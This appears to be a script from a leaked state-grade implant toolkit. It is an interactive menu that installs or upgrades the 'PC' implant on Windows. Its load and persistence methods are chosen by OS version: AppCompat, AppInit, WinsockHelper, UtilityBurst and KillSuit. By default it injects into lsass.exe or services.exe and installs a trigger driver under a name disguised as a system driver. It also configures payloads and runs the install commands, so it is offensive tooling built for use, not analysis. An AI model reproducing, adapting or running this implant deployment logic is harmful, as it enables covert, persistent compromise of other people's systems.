@include "_Arrays.dsi"; @include "_LpHelperFunctions.dsi"; @include "_Menu.dsi"; @include "_VersionChecks.dsi"; @echo off; if (($argc != 2) || (($argv[1] != "INSTALL") && ($argv[1] != "UPGRADE"))) { echo("* Invalid parameter(s)", ERROR); echo "'$argv[1]'"; echo(); echo("Usage: $argv[0] "); return false; } string $arch, $os; if (!_GetArch($arch) || !_GetOsFamily($os)) { echo("* Failed to get ARCH + OS for install", ERROR); return false; } int $major, $minor, $servicePack; if(!_GetOsVersion($major, $minor, $servicePack)) { echo("* Failed to get OS version for install", ERROR); return false; } string %params; # Vista or better default if ($major >= 6) { _AppendString(%params{'loadMethods'}, "AppCompat"); } # pre-Win8 if (($major < 6) || (($major == 6) && ($minor < 2))) { _AppendString(%params{'loadMethods'}, "WinsockHelper"); } # 32-bit and pre-Vista if ($arch == "i386" && ($major <= 5)) { _AppendString(%params{'loadMethods'}, "UtilityBurst"); } if (`script _IsKisuAvailable.dss -project DEMI -quiet`) { _AppendString(%params{'loadMethods'}, "KillSuit"); } # pre-Vista if ($major <= 5) { _AppendString(%params{'loadMethods'}, "AppInit"); } _AppendString(%params{'commsTypes'}, "Winsock"); # Restore this line if resurrecting FLAV. Also, check diff to previous. There's a menu item and a function to restore. #_AppendString(%params{'commsTypes'}, "FlewAvenue"); # setup defaults %params{'project'} = "Pc"; %params{'loadChoice'} = %params{'loadMethods'}[0]; %params{'commsChoice'} = %params{'commsTypes'}[0]; %params{'loadbinType'} = "sharedlib"; %params{'nopause'} = "true"; %params{'arch'} = $arch; %params{'os'} = $os; %params{'driverName'} = "ntfltmgr"; %params{'infoValue'} = "mrxsmbmg"; if (_IsWindowsNt4()) { %params{'procName'} = "services.exe"; } else { %params{'procName'} = "lsass.exe"; } #Default AppCompat on Win8+ if (defined($major) && defined($minor) && (($major > 6) || (($major == 6) && ($minor >= 2)))) { %params{'loadChoice'} = "AppCompat"; } if ($argv[1] == "INSTALL") { %params{'script'} = "_Install.dss"; %params{'python'} = "_Install.py"; %params{'action'} = "Install"; } else if ($argv[1] == "UPGRADE") { %params{'script'} = "_Upgrade.dss"; %params{'python'} = "_Upgrade.py"; %params{'action'} = "Upgrade"; %params{'driverOldName'} = %params{'driverName'}; } else { echo("* Invalid action ($argv[1])", ERROR); return false; } # When _install.dss is ported to python, use dsz.windows.driver's _isDriverSigningEnabled() method instead if (($major >= 6) && ($arch == "x64")) { %params{'driverSigning'} = "true"; } else { %params{'driverSigning'} = "false"; } # create menu string %menu; if (!_CreateMenu(%menu, "%params{'project'} %params{'action'}", %params{'hmenu'}) || !defined(%params{'hmenu'}) || !_SetHeader(%menu, %params{'hmenu'}, "PcHeader" ) || !_AddSection(%menu, %params{'hmenu'}, "Configuration", %params{'hsConfig'}) || !defined(%params{'hsConfig'}) || !_AddOption(%menu, %params{'hsConfig'}, "Change load method", "ChangeLoadMethod") || !_AddOption(%menu, %params{'hsConfig'}, "Change loader name", "ChangeLoaderName", false, %params{'hChangeLoader'}) || ((%params{'action'} == "Install") && !_AddOption(%menu, %params{'hsConfig'}, "Change trigger driver name", "ChangeTriggerName", true, %params{'hChangeTrigger'})) || ((%params{'action'} == "Upgrade") && (!_AddOption(%menu, %params{'hsConfig'}, "Change old trigger driver name", "ChangeOldTriggerName", true, %params{'hChangeOldTrigger'}) || !_AddOption(%menu, %params{'hsConfig'}, "Change new trigger driver name", "ChangeTriggerName", true, %params{'hChangeTrigger'}))) || !_AddOption(%menu, %params{'hsConfig'}, "Change process name", "ChangeProcessName", true, %params{'hChangeProcess'}) || !_AddSection(%menu, %params{'hmenu'}, "KiSu Connection", %params{'kisuConnection'}) || !defined(%params{'kisuConnection'}) || !_AddOption(%menu, %params{'kisuConnection'}, "Connect to PC's KiSu", "ConnectToKiSu", false, %params{'kisuConnection_connect'}) || !_AddOption(%menu, %params{'kisuConnection'}, "Disconnect from KiSu", "DisconnectFromKiSu", false, %params{'kisuConnection_disconnect'}) || !_AddOption(%menu, %params{'kisuConnection'}, "Change to PC's KiSu", "ChangeToKiSu", false, %params{'kisuConnection_change'}) || !_AddOption(%menu, %params{'kisuConnection'}, "Install PC's KiSu", "InstallKiSu", false, %params{'kisuConnection_install'}) || !_AddSection(%menu, %params{'hmenu'}, "Payload", %params{'hsPayload'}) || !defined(%params{'hsPayload'}) || !_AddOption(%menu, %params{'hsPayload'}, "Prepare a new payload", "PrepPayload") || !_AddOption(%menu, %params{'hsPayload'}, "Pick an existing payload", "PickPayload") || !_AddSection(%menu, %params{'hmenu'}, "Actions", %params{'hsActions'}) || !defined(%params{'hsActions'}) || !_AddOption(%menu, %params{'hsActions'}, "Perform %params{'action'}", "PerformAction")) { echo("*** Unable to create %params{'project'} menu ***", ERROR); return false; } return _ExecuteMenu(%menu, %params{'hmenu'}, %params); #------------------------------------------------------------------------------# sub ChangeLoadMethod(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; string $choice; if (!_ExecuteSimpleMenu("Choose a load method", %params{'loadMethods'}, $choice) || !defined($choice)) { return true; } if (defined($choice)) { %params{'loadChoice'} = $choice; } if ($choice == "UtilityBurst") { _HideOption(%menu, %params{'hChangeProcess'}); _ShowOption(%menu, %params{'hChangeLoader'}); } else { _ShowOption(%menu, %params{'hChangeProcess'}); _HideOption(%menu, %params{'hChangeLoader'}); } # reset payload since this change may have invalidated that choice UndefKey(%params, "payloadName"); UndefKey(%params, "payloadFile"); return true; } /* end ChangeLoadMethod */ #------------------------------------------------------------------------------# sub ChangeLoaderName(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; string $name; if (!GetInput("Enter the new loader name", $name, %params{'infoValue'}) || !defined($name)) { return true; } %params{'infoValue'} = $name; return true; } /* end ChangeLoaderName */ #------------------------------------------------------------------------------# sub ChangeProcessName(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; string $name; if (!GetInput("Enter the new process name", $name, %params{'procName'}) || !defined($name)) { return true; } %params{'procName'} = $name; return true; } /* end ChangeProcessName */ #------------------------------------------------------------------------------# sub ChangeTriggerName(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; string $name; if (!GetInput("Enter the new trigger driver name", $name, %params{'driverName'}) || !defined($name)) { return true; } %params{'driverName'} = $name; return true; } /* end ChangeTriggerName */ #------------------------------------------------------------------------------# sub ChangeOldTriggerName(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; string $name; if (!GetInput("Enter the old trigger driver name", $name, %params{'driverName'}) || !defined($name)) { return true; } %params{'driverOldName'} = $name; return true; } /* end ChangeTriggerName */ #------------------------------------------------------------------------------# sub PcHeader(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { _HideOption(%menu, %params{'kisuConnection_disconnect'}); _HideOption(%menu, %params{'kisuConnection_connect'}); _HideOption(%menu, %params{'kisuConnection_change'}); _HideOption(%menu, %params{'kisuConnection_install'}); $cont = true; echo "Current Configuration:"; echo " Load Method : %params{'loadChoice'}"; if (%params{'loadChoice'} == "UtilityBurst") { echo " Loader Name : %params{'infoValue'}"; } else { echo " Process Name : %params{'procName'}"; } echo " COMMS Type : %params{'commsChoice'}"; if (%params{'action'} == "Upgrade") { echo "Old Trigger Name : %params{'driverOldName'}"; } if (%params{'commsChoice'} != "FlewAvenue") { echo " Trigger Name : %params{'driverName'}"; } if (!defined(%params{'payloadName'})) { echo(" Payload : None", WARNING); } else { echo(" Payload : %params{'payloadName'}", DEFAULT); # determine payload file short name string $shortFile; RegExMatch("^.*[/\\\\]+(.*)[/\\\\]+(.*)\$", %params{'payloadFile'}, $shortFile); echo(" $shortFile[0]/$shortFile[1]", DEFAULT); } # check on KiSu connected status int $id; string $status = "Unknown"; int $state = WARNING; if (GetEnv("_DEMI_KISU_COMMS_ESTABLISHED", $id)) { _ShowOption(%menu, %params{'kisuConnection_disconnect'}); # connected -- is it to a PC KiSu? if ($id == GetKiSuId()) { $status = "Connected"; $state = DEFAULT; } else { $status = "Connected to non-PC KiSu"; _ShowOption(%menu, %params{'kisuConnection_change'}); } } else { _ShowOption(%menu, %params{'kisuConnection_connect'}); _ShowOption(%menu, %params{'kisuConnection_install'}); $status = "Not connected"; } echo(" KiSu Connection : $status", $state); return true; } /* end PcHeader */ #------------------------------------------------------------------------------# sub PerformAction(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; int $kisuId; if (GetEnv("_DEMI_KISU_COMMS_ESTABLISHED", $kisuId) && ($kisuId != GetKiSuId())) { echo("* You are connected to a non-PC KiSu", WARNING); if (!prompt("Do you want to continue?", False)) { return true; } } if (!defined(%params{'payloadFile'})) { echo("* A payload has not been assigned", ERROR); pause; return true; } # we need to know if we install via normal or special methods string $menuItems; string $cmd; string $method = "Trigger Driver"; string $project = "DmGz"; string $args = "-driver %params{'driverName'}"; if (defined(%params{'driverOldName'})) { $args = "$args -oldname %params{'driverOldName'}"; } if (%params{'commsChoice'} == "FlewAvenue") { $method = "FLAV"; $project = "FlAv"; $args = "FlAv"; } _AppendString($menuItems, "Do Not %params{'action'} $method"); _AppendString($cmd, ""); if (%params{'driverSigning'} != "true") { _AppendString($menuItems, "%params{'action'} $method Normally"); _AppendString($cmd, "python Install/%params{'python'} -project $project -args \"$args -method dsz\""); } _AppendString($menuItems, "%params{'action'} $method via KISU"); _AppendString($cmd, "python Install/%params{'python'} -project $project -args \"$args -method demi\""); string $selectedString; int $selectedIndex; if (!_ExecuteSimpleMenu("Install $method?", $menuItems, $selectedString, $selectedIndex)) { echo("* Failed to get choice", ERROR); return false; } if (defined($selectedIndex)) { if ($cmd[$selectedIndex] != "") { if (!`$cmd[$selectedIndex]`) { echo("* Failed to %params{'action'} $method", ERROR); pause; return true; } } } if (%params{'loadChoice'} == "UtilityBurst") { if (!`script Install/%params{'script'} -project UtBu -args "\\"%params{'payloadFile'}\\" %params{'infoValue'}"`) { echo("* Failed to %params{'action'} PC", ERROR); pause; return true; } } else if (%params{'loadChoice'} == "AppInit") { if (!`script AppInit/%params{'script'} -args "\\"%params{'payloadFile'}\\" \\"%params{'procName'}\\""`) { echo("* Failed to %params{'action'} PC", ERROR); pause; return true; } } else if (%params{'loadChoice'} == "AppCompat") { if (!`script AppCompat/%params{'script'} -args "\\"%params{'payloadFile'}\\" \\"%params{'procName'}\\""`) { echo("* Failed to %params{'action'} PC", ERROR); pause; return true; } } else if (%params{'loadChoice'} == "WinsockHelper") { if (!`script WinsockHelp/%params{'script'} -args "\\"%params{'payloadFile'}\\" \\"%params{'procName'}\\""`) { echo("* Failed to %params{'action'} PC", ERROR); pause; return true; } } else if (%params{'loadChoice'} == "KillSuit") { if (!`python Install/winnt/KiSu/%params{'python'} -args "%params{'payloadFile'} %params{'procName'}"`) { echo("* Failed to %params{'action'} PC", ERROR); pause; return true; } } else { echo("* Unknown load type (%params{'loadChoice'})", ERROR); return true; } if( !`python Payload/_FinalizePayload.py -args %params{'payloadFile'}`) { echo("* Unable to finalize deployed payload", ERROR ); return true; } return true; } /* end PerformAction */ #------------------------------------------------------------------------------# sub PickPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level4 -verbose"; StrCat($extraArgs, " -extra Comms=%params{'commsChoice'}"); StrCat($extraArgs, " -binType %params{'loadBinType'}"); HandlePersistenceArgs(%params{'loadChoice'}, $extraArgs); @record on; if (!`python Payload/_Prep.py -args "-action pick $extraArgs"`) { echo("* Failed to pick payload", ERROR); pause; return true; } @record off; string $file, $name; if (!GetCmdData("Payload::Description", $name) || !defined($name) || !GetCmdData("Payload::File", $file) || !defined($file)) { echo("* Failed to get payload information", ERROR); pause; return true; } %params{'payloadName'} = $name; %params{'payloadFile'} = $file; return true; } /* end PickPayload */ #------------------------------------------------------------------------------# sub PrepPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level4"; StrCat($extraArgs, " -extra Comms=%params{'commsChoice'}"); StrCat($extraArgs, " -binType %params{'loadBinType'}"); HandlePersistenceArgs(%params{'loadChoice'}, $extraArgs); if (%params{'loadChoice'} == "UtilityBurst") { if (StrLen(%params{'infoValue'}) > 0) { StrCat($extraArgs, " -info %params{'infoValue'}"); } } else { if (StrLen(%params{'procName'}) > 0) { StrCat($extraArgs, " -process %params{'procName'}"); } } if (%params{'commsChoice'} != "FlewAvenue") { if (StrLen(%params{'driverName'}) > 0) { StrCat($extraArgs, " -driver %params{'driverName'}"); } } @record on; if (!`python Payload/_Prep.py -project Pc -args "-action configure $extraArgs"`) { echo("* Failed to configure payload", ERROR); return true; } @record off; # assume that they want to pick whatever one they just configured string $file, $name; if (!GetCmdData("Payload::Description", $name) || !defined($name) || !GetCmdData("Payload::File", $file) || !defined($file)) { echo("* Failed to get payload information", ERROR); return true; } %params{'payloadName'} = $name; %params{'payloadFile'} = $file; return true; } /* end PrepPayload */ sub HandlePersistenceArgs(IN string $loadChoice, REF string $extraArgs) { if ($loadChoice == "UtilityBurst") { StrCat($extraArgs, " -utilityburst"); } else if ($loadChoice == "AppCompat") { StrCat($extraArgs, " -appcompat"); } else if ($loadChoice == "WinsockHelper") { StrCat($extraArgs, " -winsockhelperapi"); } else { StrCat($extraArgs, " -generic"); } } #------------------------------------------------------------------------------# sub ConnectToKiSu(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; echo "Connecting to KiSu installation"; if (`kisu_connect -type pc`) { echo(" SUCCESS", GOOD); } else { echo(" FAILURE", ERROR); pause; } return true; } #------------------------------------------------------------------------------# sub ChangeToKiSu(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; bool $bPause = false; echo "Disconnecting from KiSu installation"; if (`kisu_disconnect`) { echo(" SUCCESS", GOOD); } else { echo(" FAILURE", ERROR); $bPause = true; } echo "Connecting to KiSu installation"; if (`kisu_connect -type pc`) { echo(" SUCCESS", GOOD); } else { echo(" FAILURE", ERROR); $bPause = true; } if ($bPause) { pause; } return true; } #------------------------------------------------------------------------------# sub DisconnectFromKiSu(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; echo "Disconnecting from KiSu installation"; if (`kisu_disconnect`) { echo(" SUCCESS", GOOD); } else { echo(" FAILURE", ERROR); pause; } return true; } #------------------------------------------------------------------------------# sub(int) GetKiSuId() { # defined in the .xml file for KISU return 0x7a43e1fa; } #------------------------------------------------------------------------------# sub InstallKiSu(REF string %menu, REF string %params, IN string $key, OUT bool $cont) { $cont = true; echo "Install PC KiSu installation"; if (`kisu_install -type pc`) { echo(" SUCCESS", GOOD); echo "Connecting to PC's KISU"; if (`kisu_connect -type pc`) { echo(" SUCCESS", GOOD); } } else { echo(" FAILURE", ERROR); pause; } return true; }